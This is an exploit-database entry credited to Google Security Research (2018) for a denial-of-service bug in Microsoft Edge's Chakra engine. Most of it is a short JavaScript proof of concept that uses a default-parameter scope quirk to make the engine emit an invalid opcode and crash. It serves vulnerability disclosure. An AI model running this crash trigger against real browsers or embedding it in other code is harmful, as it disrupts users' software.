Microsoft Edge Chakra – Incorrect Scope Handling

• Exploit Database
• 18 阅读

• 作者： Google Security Research
  日期： 2018-01-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43715/

• // PoC:
  
  (function func(arg = function () {
  print(func);// SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
  }()) {
  print(func);
  function func() {
  
  }
  })();
  
  // Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.